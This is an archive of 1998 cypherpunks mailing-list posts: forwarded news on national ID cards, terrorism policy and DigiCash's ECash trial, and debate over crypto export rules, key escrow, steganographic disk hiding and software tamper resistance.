From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 19 Sep 1998 14:28:12 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ID proposal raises privacy concerns
Message-ID: <199809191929.MAA03100@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: ID proposal raises privacy concerns
Date: Thu, 17 Sep 1998 17:30:47 -0500
To: believer@telepath.com

Source:  Fox News - AP

ID proposal raises privacy concerns
 2.15 p.m. ET (1816 GMT) September 17, 1998

 WASHINGTON (AP) - Lawmakers raised loss-of-privacy objections Thursday to
a proposal that would use Social Security numbers to help curb the number
of illegal immigrants who unlawfully get government benefits. 

 The proposal by the National Highway Traffic Safety Administration would
require federal agencies to accept, as proof of identity, a driver's
license that conforms to certain standards. A Social Security number would
be among the requirements. 

 Rep. David McIntosh, R-Ind., said the measure "appears to create a de
facto national ID card'' for all Americans. 

 "With a Social Security number, anyone can find out almost anything about
an individual on the Internet, including where he or she lives,'' said
McIntosh, who chairs the House Government Reform and Oversight's
subcommittee on national economic growth. "This technology gives stalkers
and abusers easy access to their victims.'' 

 During a committee hearing on the proposal, Celene Cross described how
someone fraudulently used her name and Social Security number to obtain
credit cards and rack up more than $17,000 in charges. Cross said she has
spent three years trying to clear her credit history but problems continue
to arise, and "I have just quit applying for credit altogether.'' 

 Marvin Young, another panel witness, told lawmakers how a former roommate
used his Social Security number to assume his identity and open more than
40 charge cards. 

 "I've worked hard and never made a late payment in my life, but this other
guy has just messed up everything for me,'' Young said. 

 In a statement submitted to the committee, the National Highway Traffic
Safety Administration said its proposal is intended to "prevent the use of
state driver's licenses and other identification documents by illegal
immigrants seeking to obtain benefits under federal programs.'' 

                  (c) 1998 Associated Press. All rights reserved.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 19 Sep 1998 14:28:04 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Terrorism is Shifting Threat to U.S.
Message-ID: <199809191929.MAA03111@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Terrorism is Shifting Threat to U.S.
Date: Thu, 17 Sep 1998 17:36:29 -0500
To: believer@telepath.com

Source:  USIA
http://www.usia.gov/current/news/latest/98091706.plt.html?/products/washfile
/newsitem.shtml

17 September 1998 

U.S. OFFICIALS SEE TERRORISM AS A SHIFTING THREAT TO
NATION 

(State Department, congressional experts outline views) (700)
By Ralph Dannheisser
USIA Congressional Correspondent

Washington -- A State Department official and a congressman outlined
the changing face of terrorism before a business group, and warned
that it poses increasing concerns for Americans at home and abroad.

Gordon Gray, director for regional affairs in State's counterterrorism
office and Representative Jim Saxton, a New Jersey Republican, were
among the speakers at a briefing for business leaders September 17
sponsored by Equity International, Inc.

Gray told the group that "the good news is the decline in state
terrorism." But, he quickly added, "the bad news is the same thing --
the decline in state terrorism."

That seeming contradiction comes into play, Gray said, because "the
decline in state sponsorship poses new problems, as we see more and
more loosely knit organizations" like that headed by Saudi Arabian
businessman Usama bin Ladin -- groups that by their nature are harder
to get at. Bin Ladin is thought to have been behind the recent bombing
of U.S. embassies in Kenya and Tanzania.

Gray portrayed a mixed picture with respect to terrorist activity.

On the one hand, he said, "last month's bombings at the two U.S.
embassies and in Northern Ireland "painfully reinforce the dangers
posed by terrorists," whose "attacks are becoming far more lethal in
recent years," -- even as the critical infrastructure in our
increasingly sophisticated society "becomes that much more
vulnerable."

But at the same time, Gray observed, "There are some positive signs."
For example, he reported, the total number of terrorist incidents in
1996 and 1997 fell to a 25-year low.

"It's important that we not exaggerate what the actual threat is.
That's exactly what terrorists want to do" to intimidate their foes,
he said.

Gray cited four pillars of U.S. policy with respect to terrorism:

-- a strict refusal to grant concessions to terrorists;
-- a determination to apply the rule of law;
-- steps to help friendly countries increase their capabilities to
combat terrorism, and
-- a continuing effort to put pressure on state sponsors of terrorism
as well as the terrorists themselves.

Would-be terrorists must be convinced that "our memories are long, our
capabilities are strong," he said.

Saxton, chairman of the House Task Force on Terrorism and
Unconventional Warfare, told the audience of business executives there
has been a distinct change in the use of terrorism in the decade of
the 1990s.

The United States demonstrated to foes, most notably in the Gulf War,
that "our conventional capability was rather overwhelming," and so
"the same group of nations with the same long term agenda had to find
different ways to carry out and achieve their objectives," he said.

He named Iran, Iraq, Libya, Sudan, Pakistan and North Korea as
"hotbeds of international terrorist activity."

And, Saxton said, it is "an unfortunate fact of life" that many
terrorist nations "are beginning to avail themselves of technology
that we generally refer to as weapons of mass destruction."

A real threat now exists of attacks on American cities, perhaps using
nuclear devices, he warned. While most Americans outside Washington
have not paid much attention to the threat, it is "something we have
to do for our own survival," he said.

Saxton rejected the notion that bin Ladin is operating independently.
"Bin Ladin is a puppet....He is paid big money to carry out acts of
terrorism by the leaders of Iran, Iraq, Syria, Pakistan, Sudan,
Libya," he declared.

Asked why Pakistan is not on the State Department's list of terrorist
states, he responded, "I can tell you they're on our (the task
force's) list. We believe they're a major sponsoring state. We believe
that they are one of the more dangerous sponsoring states." But the
Department has resisted efforts to classify the country as such, he
noted.

Saxton contended that state sponsors of terrorism are spending more
than $500 million a year on "groups like Hamas and the Islamic Jihad"
-- organizations that he said get their funding from drug traffic,
counterfeiting and "contributions from Islamist fundamentalist groups
around the world" in addition to direct government payments.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AIMSX@aol.com
Date: Sat, 19 Sep 1998 12:39:37 +0800
To: cypherpunks@toad.com
Subject: Re: Larry Gilbert, AOLers, and the Hyper-real flamer
Message-ID: <a3685fe5.3603e9cf@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



wow.. you really do think I do all those things - spamming, mailbombing... and
all that other huh?

You really give me way to much credit, as I only use it for internet access,
and access to a UNIX machine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 19 Sep 1998 13:08:58 +0800
To: cryptography@c2.net
Subject: IP: Going Cashless: Bank ends ECash trial period
Message-ID: <v04011741b2299f25b517@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Sat, 19 Sep 1998 07:47:55 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Going Cashless: Bank ends ECash trial period
Mime-Version: 1.0
Sender: ignition-point-request@majordomo.pobox.com
Precedence: first-class

Source:  ComputerWorld
http://www.computerworld.com/home/news.nsf/all/9809174ecash

(Online News, 09/17/98 12:16 PM)

Bank ends electronic cash trial
By Mary Lisbeth D'Amico

 The sole U.S. bank to show interest in online payment via electronic cash
this week abruptly ended its three-year trial of DigiCash, Inc.'s ECash
software.

 Citing a new strategy and market conditions, St. Louis-based Mercantile
Bank this week ended a trial that allowed customers to make purchases over
the Internet with electronic coins, Mercantile spokeswoman Beth Fagen
confirmed.

 The trial used ECash, an electronic cash software program created by Palo
Alto, Calif.-based DigiCash. The bank was the sole U.S. client for
DigiCash, which hopes to have another major U.S. trial in place by year's
end, according to William Donahoo, DigiCash's vice president of business
development.

 The trial brought together 5,000 customers with 300 Internet merchants.
Customers gave the bank their credit-card information only once, then
created electronic "coins" at the bank, allowing them to make small
purchases -- or micropayments -- of goods over the Internet without having
to enter a credit-card number each time. The buyer also remains anonymous
to the merchant because the coins don't identify the customer.

 Mercantile inherited the ECash project when it purchased Mark Twain Bank
in 1997, Fagen said. After reviewing its strategy, the bank decided to call
a halt to the trial after it became apparent that few of the project's
participants were Mercantile's core customers in the six Midwestern states
where it operates, she explained.

 Fagen also cited the changing climate in the U.S. for Internet payments.
When the trial was started in 1995, she said, "people were more fearful of
using credit cards to pay for things over the Internet. Now that seems to
have disappeared."

 Although Mark Twain was the first bank worldwide to try out ECash, its
core business never was quite a match for the product, according to Donahoo.

 "But we are still bullish about our prospects for this market," Donahoo
said, pointing out that automated teller machines took nearly 20 years to
gain favor with consumers. DigiCash will concentrate on finding the right
type of merchants for its U.S.-based projects, he said.

 In Europe, DigiCash has ECash projects in progress at Credit Suisse, the
Bank of Austria and Deutsche Bank.

 Copyright (c) 1998 Computerworld, Inc.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 19 Sep 1998 13:20:00 +0800
To: cypherpunks@toad.com
Subject: Stego-empty hard drives...
In-Reply-To: <199809190501.HAA12423@replay.com>
Message-ID: <v04011743b229a12c2f0b@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:01 AM -0400 on 9/19/98, Anonymous wrote:
> (Had this been a UK Customs 'inspection' of the contents of the disk, I
> might have had to explain the half-gig of "noise" I have on the disk.
> Only, it really is noise. Really.)

This makes me think of something that I probably missed in the bowels of
someone's long previous stego posting (um, stego^stego? :-)), how would you
go about either:

Stegoing an encrypted partition as "blank" hard drive space without
actually writing over it unless you wanted to?

or, even,

Stegoing an encrypted partition as not even *there* at all?


Doesn't seem like it would be too hard conceptually (hah!) and, if done,
might actually defeat such Archie-look-up-the-dress as the British
customsfolk are wont to do these days.

Obviously, even if the partition were found, it would look, to sniffer
programs, as if it were empty, right? :-).

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Sat, 19 Sep 1998 16:13:07 +0800
To: "Arnold G. Reinhold" <reinhold@world.std.com>
Subject: Re: Questions for Magaziner?
In-Reply-To: <v03130304b227b7401a3a@[24.128.118.53]>
Message-ID: <36041E82.F4F072ED@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain



> Arnold G. Reinhold wrote:
>
> One question I'd like asked is whether the US Gov will approve 56-bit RC-4
> for export on the same terms as 56-bit DES. That would allow export
> versions of web browsers to be upgraded painlessly, making international
> e-commerce 64 thousand times more secure than existing 40-bit browsers.
> (56-bit DES browsers would require every merchant to upgrade their SSL
> servers and introduce a lot of unneeded complexity.)

Actually, it wouldn't be any easier to deploy 56-bit RC4 than DES.  Either
would require roughly the same changes to both clients and servers.

--
What is appropriate for the master is not appropriate| Tom Weinstein
for the novice.  You must understand Tao before      | tomw@netscape.com
transcending structure.  -- The Tao of Programming   |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 19 Sep 1998 14:14:26 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: TruthMonger key's password! (fwd)
Message-ID: <199809191941.OAA09260@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 19 Sep 1998 19:46:43 +0100
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: TruthMonger key's password!

Note the magic circle comment as a potential passphrase, he did say
'others'.

> What is going on here?  Is Toto still at large, drunk behind the
> keyboard?  Is Toto not one person?  Or have the IRS extracted Carl
> Johnson's passphrases from him and got busy playing mind-games with
> us?

Or more likely there is one or more persons who have an arrangement.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 19 Sep 1998 08:03:27 +0800
To: cypherpunks@cyberpass.net
Subject: Re: CHALLENGE? Toto/signature attack w. unpublished pub
Message-ID: <199809191306.PAA04939@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



What remailer is the alleged toto speaking of?


>   You might want to check with the Webmasters at the sites
> quoted above to see who has accessed their web sites this
> morning. The anonymous remailer I will be using is an open
> secret to CypherPunks around the world as a really bad 
> attempt at disguising my true MeatSpace identity. This alone

==
"The same thing we do every night Pinkey,
 try to take over the WORLD!"
                          - The brain
_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Sat, 19 Sep 1998 18:00:30 +0800
To: cypherpunks@cyberpass.net
Subject: A personal response to your email to sixdegrees
Message-ID: <0d7ffbebaef4f88290c8cf8607ef5329@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



BW1015  DEC 05,1997       4:06  PACIFIC      07:06  EASTERN


( BW)(PROFILE/MACROVIEW-COMM) Corporate Profile for Macroview Communications
Corp., dated Dec. 5, 1997


    Business Editors

    NEW YORK--(BUSINESS WIRE)--Dec. 5, 1997--The following Corporate Profile is available for inclusion in your files.
News releases for this client are distributed by Business Wire and also become part of the leading databases and online
services, including all of the leading Internet-based services.

                                                                              
Published Date:   December 5, 1997                                            
                                                                              
Company Name:     MacroView Communications Corp/sixdegrees                                                             
                                                                                                                       
Address:          90 William Street, 3rd Floor                                                                         
                  New York, N.Y. 10038                                                                                 
                                                                             
Main Telephone
 Number:          212-583-1234                                                           
                                                                              
Internet Home
 Page Address
  (URL):          www.sixdegrees.com

Chief Executive                                                               
 Officer:         Andrew Weinreich                                                           
                                                                              
Investor Relations                                                            
 Contact:         Shoshana Zilberberg
 Business number: 212-583-1234 X628                                                            
 
Public Relations                                                              
 Contact:         Shoshana Zilberberg                                                              
 Business number: 212-583-1234 X628                                                              
                                                                              
Industry:         Internet/WWW                                                           



    Company description: MacroView Communications Corp., developer of sixdegrees, is in the business of creating
Web-based products which help individuals build their own virtual communities based on their personal and professional
relationships. sixdegrees, located on the Web at http://www.sixdegrees.com, allows members to uncover the power of their
greatest natural resource - the people they know.
    Inspired by the theory that every person in the world is connected to every other person through a path of no more than six
relationships, sixdegrees offers several proprietary applications, all of which help members leverage their own trusted network
of contacts. Since its launch in January of 1997, sixdegrees members have been able to make new contacts quickly and easily,
gain valuable help and information and communicate directly with their own growing virtual community, all within the confines
of the sixdegrees property. As of December 1997, there were over 250,000 sixdegrees members who had listed over
930,000 contacts in the sixdegrees database. 

    --30--cvw/ny*
                                                                              
   CONTACT:  Macroview Communications Corp.
             Shoshana Zilberberg
             Director of Marketing & Communciations
             shoshana@sixdegrees.com
             
   KEYWORD:  NEW YORK
   INDUSTRY KEYWORD:  COMPUTERS/ELECTRONICS COMED 
INTERACTIVE/MULTIMEDIA/INTERNET
   PROFILE:  YES
   URL:  http://www.sixdegrees.com

<http://www.businesswire.com/webbox/bw.120597/550028.htm>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 19 Sep 1998 14:40:43 +0800
To: John Young <cypherpunks@toad.com
Subject: Re: SecDef on Crypto, Privacy
In-Reply-To: <199809171833.OAA01552@camel14.mindspring.com>
Message-ID: <19980919153245.A25309@weathership.homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



The UNited States has long given far too much emphasis to gadget based 
intelligence.  Theres little conflict between my privacy and a spy in
bin laden's organization.  Its unfortunate that senior officials are
so taken with national technical means, even in the wake of their
utter failure to catch nuclear test preperations in two countries, and 
missle construction in a third.

Adam




On Thu, Sep 17, 1998 at 02:26:27PM -0400, John Young wrote:
| Excerpt from DoD transcription of Secretary of Defense Cohen's
| remarks at the Council on Foreign Relations, New York City, 
| September 14, 1998:
| 
| [Begin]
| 
| Let me say one other thing about terrorism.  We in this country 
| much recognize the tension which will exist as you ask us, and 
| we will ask all successor administrations, to protect us.  And 
| you say, how do you protect someone against terrorists?  It means 
| increased intelligence.  It means increased intelligence, having 
| greater capability on the ground or from national technical 
| sources to find out who is planning and plotting what at what 
| place and what time.  
| 
| To do that is going to put us in somewhat of a direct conflict 
| with rights to privacy, something that we hold very dear in this 
| country.  So the more intelligence-gathering responsibilities that 
| any administration is going to have, there's going to come a point 
| of tension and, indeed, friction between how much are you willing 
| to give up in order to be secure.  Those are the kind of unpleasant 
| choices that are going to be manifesting themselves in the near 
| future.  We haven't really faced up to it yet.  We're starting to 
| see some of that conflict at least intellectually develop when you 
| see the manufacturers of software who don't like the fact that the 
| law enforcement, the FBI, the Justice Department wants to have some 
| method of getting into encrypted technology. 
|  
| You say, "Wait a minute, that's my right of privacy.  I'm a 
| businessman or woman.  I want to be able to send information out 
| over those -- those airwaves and have them completely protected."  
| Our Justice Department says, "Wait a minute, you want us to protect 
| you.  But you're allowing criminal elements, terrorists and others
|  -- organized crime, drug cartels -- to encrypt their 
| telecommunications to the point where don't know what's going on.  
| And then something is going to happen, and you'll say, where were you?"
| 
| So those are the kinds of tensions that are going to continue to exist.  
| But we're going to have to have more intelligence to effectively deal 
| with terrorism in the future.  
| 
| [End excerpt]
| 
| Full transcript:
| 
|    http://jya.com/wsc091498.htm  (49K)

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pallas Anonymous Remailer <athena@cyberpass.net>
Date: Sat, 19 Sep 1998 18:40:15 +0800
To: cypherpunks@cyberpass.net
Subject: A personal response to your email to sixdegrees
Message-ID: <d628cc71584a63262c3df148e3dfb40d@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



BW1015  DEC 05,1997       4:06  PACIFIC      07:06  EASTERN


( BW)(PROFILE/MACROVIEW-COMM) Corporate Profile for Macroview Communications
Corp., dated Dec. 5, 1997


    Business Editors

    NEW YORK--(BUSINESS WIRE)--Dec. 5, 1997--The following Corporate Profile is available for inclusion in your files.
News releases for this client are distributed by Business Wire and also become part of the leading databases and online
services, including all of the leading Internet-based services.

                                                                              
Published Date:   December 5, 1997                                            
                                                                              
Company Name:     MacroView Communications Corp/sixdegrees                                                             
                                                                                                                       
Address:          90 William Street, 3rd Floor                                                                         
                  New York, N.Y. 10038                                                                                 
                                                                             
Main Telephone
 Number:          212-583-1234                                                           
                                                                              
Internet Home
 Page Address
  (URL):          www.sixdegrees.com

Chief Executive                                                               
 Officer:         Andrew Weinreich                                                           
                                                                              
Investor Relations                                                            
 Contact:         Shoshana Zilberberg
 Business number: 212-583-1234 X628                                                            
 
Public Relations                                                              
 Contact:         Shoshana Zilberberg                                                              
 Business number: 212-583-1234 X628                                                              
                                                                              
Industry:         Internet/WWW                                                           



    Company description: MacroView Communications Corp., developer of sixdegrees, is in the business of creating
Web-based products which help individuals build their own virtual communities based on their personal and professional
relationships. sixdegrees, located on the Web at http://www.sixdegrees.com, allows members to uncover the power of their
greatest natural resource - the people they know.
    Inspired by the theory that every person in the world is connected to every other person through a path of no more than six
relationships, sixdegrees offers several proprietary applications, all of which help members leverage their own trusted network
of contacts. Since its launch in January of 1997, sixdegrees members have been able to make new contacts quickly and easily,
gain valuable help and information and communicate directly with their own growing virtual community, all within the confines
of the sixdegrees property. As of December 1997, there were over 250,000 sixdegrees members who had listed over
930,000 contacts in the sixdegrees database. 

    --30--cvw/ny*
                                                                              
   CONTACT:  Macroview Communications Corp.
             Shoshana Zilberberg
             Director of Marketing & Communciations
             shoshana@sixdegrees.com
             
   KEYWORD:  NEW YORK
   INDUSTRY KEYWORD:  COMPUTERS/ELECTRONICS COMED 
INTERACTIVE/MULTIMEDIA/INTERNET
   PROFILE:  YES
   URL:  http://www.sixdegrees.com

<http://www.businesswire.com/webbox/bw.120597/550028.htm>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas Junker" <tjunker@phoenix.net>
Date: Sat, 19 Sep 1998 16:55:42 +0800
To: paul_gillin@cw.com
Subject: Re: Going Cashless: Bank ends ECash trial period
Message-ID: <199809192137.QAA24495@sneety.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Paul Gillin
Editor in Chief
Computerworld

Dear Paul:

The Computerworld article in Online News, 09/17/98 12:16 PM,

	Bank ends electronic cash trial
		By Mary Lisbeth D'Amico

	http://www.computerworld.com/home/news.nsf/all/9809174ecash

is a good example of today's low standards in journalistic accuracy.  
Ms. D'Amico failed utterly to comprehend what Mark Twain Bank's 
Digicash program was.  She wrote:

    Customers gave the bank their credit-card information only once,
    then created electronic "coins" at the bank, allowing them to
    make small purchases -- or micropayments -- of goods over the
    Internet without having to enter a credit-card number each time. 

Ms. D'Amico evidently confused the Digicash program with other, 
dissimilar Internet transaction mechanisms that are substitutes for 
passing credit card information over the public Internet.  In fact, 
the Digicash program HAS NOTHING TO DO WITH CREDIT CARDS OR CREDIT 
PURCHASES.  Is that clear enough?  Digicash provided the means to 
move money on deposit with Mark Twain Bank into an electronic 
"purse," from which it could be spent with merchants equipped with 
Digicash software.  No credit.  No credit cards.  No necessarily 
"small" purchases.

Ms. D'Amico's profound leap of misunderstanding misinforms and 
misleads readers.  It also rather completely vacates the presumably 
explanatory comment she attributes to the Bank's new owner's 
representative, Beth Fagen:

    Fagen also cited the changing climate in the U.S. for Internet
    payments. When the trial was started in 1995, she said, "people
    were more fearful of using credit cards to pay for things over
    the Internet. Now that seems to have disappeared." 

Had Ms. D'Amico understood the nature of Digicash, she may have 
questioned Ms. Fagen about the apparent non sequitur.  If Digicash 
had nothing to do with making credit transactions "safer," why would 
decreasing public fear of using credit cards on the Internet have 
anything to do with Mercantile's decision to abruptly discontinue the 
Digicash program?

The key fact completely overlooked, the one thing that distinguished 
the Digicash program from all the look-alike credit-card protection 
schemes, was the anonymity of the purchaser.  Ms. D'Amico mentions it 
in passing as if it were merely a curiosity.  In this increasingly 
fishbowl world, online purchases, particularly of intangibles such as 
information, are subject to tracking and record keeping that is 
clearly, demonstrably, becoming a danger to the privacy and well-
being of the online public.  It is to be expected that products and 
services such as offered by Digicash will find an increasingly 
enthusiastic market as the private and governmental abuses of 
information gathered on line become more widespread and more widely 
known.

Digicash, by the way, was never considered a true "micropayment" 
system.  Micropayment refers to the facility of trivially making and 
accepting payments as small as 1/100th, even 1/1,000th of one cent.  
No such systems have yet been fielded, and no credit card system can 
come anywhere close to the low transaction cost required to permit 
micropayments for access to Web pages, articles, or the use of minor 
online services such as HTML verifiers, graphic button builders, etc. 
It is only a matter of time before such systems become available, and 
they will likely be both anonymous and unrelated to credit cards.  
Ms. D'Amico will no doubt report the advent of such systems as yet 
another advance in the use of credit cards on the Internet.

But then, Computerworld is the outfit that used to heavily promote 
the idea of trade unions for programmers and data entry clerks, the 
"Certified Data Processor" program, and trumpeted the release of 
virtual memory by IBM some ten years after it had been fielded by 
Burroughs Corp.  Mitigating that last, the same issue of 
Computerworld carried a small, back-pages article about Burroughs' 
virtual memory, with a picture of staff at a B-5000 site celebrating 
the anniversary with a birthday cake bearing ten candles.

Regards,

Thomas Junker
tjunker@phoenix.net

http://www.phoenix.net/~tjunker/wang.html
The Unofficial Wang VS Information Center




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@MIT.EDU>
Date: Sat, 19 Sep 1998 15:37:04 +0800
To: <scott@loftesness.com>
Subject: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <000d01bde407$01dc4a00$0300a8c0@sjl4120>
Message-ID: <199809192038.QAA29964@denmark-vesey.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain



[from a discussion of tamper-resistant hardware for payment systems
on dbs@philodox.com, a mailing list dedicated to digital bearer systems,
where Scott Loftesness, of DigiCash and Arcot Systems, mentioned ArcotSign.]

You mentioned the URL for Arcot, and I looked at the site.  It seems
rather lacking in technical details, and makes a very strong claim --
that it can provide tamper resistance in software on a hardware/OS/etc.
platform which is generally hostile (a general purpose computer).

I noticed that there are some big name cryptographers signed 
on as advisors -- Hellman and Schneier, who make some pretty 
glowing comments about the product.  I'm not generally swayed by anything 
but mathematics, physics, and logic when it comes to cryptography and 
security, despite generally agreeing with the analyses of those 
cryptographers.

I can see a couple of ways you could approximate real security using 
untrusted hardware -- either a one time password system retained by
the user (I've investigated this in the past, and it generally ends
up being a hardware token or a printed book of codes), or a remote
system like Kerberos where there exist out of band key protection 
mechanisms, or it's not real security.  I'd love to be convinced
otherwise, particularly if the technology will be available for
others to license.

I also noticed that the system is patent pending -- this would seem
to rule out the existing hardware token/one time pad system, or the
Kerberos-style central authentication server releasing security credentials
when presented with a passphrase system, as there are decades of prior
art in each encompassing all reasonable variations.  I guess this means it's
something new and interesting -- I'm sure everyone would be interested
in details.

Of course, in any system where all you do is authenticate yourself
to a remote system, but you're not provided with a link directly
between the user and the remote authority guaranteeing 
Confidentiality, Integrity, and Authentication, you can't really
make any claims other than that the user has authenticated herself
to some server -- any transactions the user could do are subject to
a man in the middle attack, so while the user has successfully authenticated
themselves to a remote server, and signed that *some* transaction
is acceptable, there's really no legal assurance that the user has signed
*any particular transaction*.  This is far weaker than the promise
of trusted hardware, where you could have a guarantee that as long as
the protocol hasn't been violated, the user has authorized a *particular*
transaction.  This may be acceptable for authenticating access to
an online retail banking web site, or corporate information, but it
would not be sufficient for an actual payment system (DBS, account
based, or other).

Always interested in learning something new which would chance my assumptions,
Ryan
rdl@mit.edu










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip Hallam-Baker" <hallam@ai.mit.edu>
Date: Sat, 19 Sep 1998 16:55:03 +0800
To: "Robert Hettinga" <dcsb@ai.mit.edu>
Subject: RE: Questions for Magaziner?
In-Reply-To: <v0401171db22874ef99b6@[139.167.130.247]>
Message-ID: <003c01bde417$497a3b50$0100000a@goedel.socrates.co.uk>
MIME-Version: 1.0
Content-Type: text/plain





> Okay, so the short precis on Magaziner's answer to my question about
> encryption controls, foriegn or domestic, is he's agin it.
>
> He says that controlling foriegn encryption is impossible, and controlling
> domestic encryption is, at the very least, unconstitutional.

This is way beyond what I expected. If I had expected him to go
beyond what he said at the MIT Media in Transition forum earlier this
year I would have made every effort to attend.

Essentially at MIT I tried to put words in his mouth by stating what
I knew he had said in private and adding that if he agreed then
Freeh would insist that one or the other of them go. He was not
at that time able to say anything more, although he did not leap
to the opportunity to push the Freeh line.


> He says that the reason the administration's encryption policy is so
> convoluted is that the law enforcement and the "economic"
> encryption camps,
> anti, and pro, evidently, is that the two sides are at loggerheads.

This statement in and of itself is not the type of thing I would
expect unless either Magaziner is planning to jump ship or he
knows that he can get away with it without retribution. If it
is the latter it would indicate that Freeh has very much less
influence than he did 6 months ago.

Not exactly a ringing endorsement of our position but something
that can be used against spokesmen for the FBI party line.

All in all I would prefer allowing the crypto export laws to
time out, becomming progressively less relevant until they
disappear than have bills appear in Congress. However good
the bill that goes into congress the result will be at best
a compromise.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip Hallam-Baker" <hallam@ai.mit.edu>
Date: Sat, 19 Sep 1998 16:55:47 +0800
To: "Alan Olsen" <rah@shipwright.com>
Subject: RE: Questions for Magaziner?
In-Reply-To: <Pine.LNX.3.96.980919023009.14249D-100000@clueserver.org>
Message-ID: <003d01bde417$4b30ec00$0100000a@goedel.socrates.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> "With all the demands from Governent to escrow keys, what steps are being
> taken to protect the these keys and/or backdoors from misuse from people
> within the Government and those outside of the Government?"
>
> "Would you use escrowed cryptography for your private communications?  Who
> would you trust to hold those keys?"

We have an answer to this one, unfortunately drowned by the various
sex scandals of assorted congressional chairmen (and other sex
scandal trivia).

Mr Freeh recently testified that he wanted access to private
communications and was immediately contradicted by the Vice President
who stated that Freeh was expressing a personal opinion and
not administration policy.

Whitehouse spin or a sign that Freeh is loosing his grip? Freeh's
attempts to ingratiate himself with the republican party have
done him no favours of late.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ron Rivest <rivest@theory.lcs.mit.edu>
Date: Sat, 19 Sep 1998 17:46:02 +0800
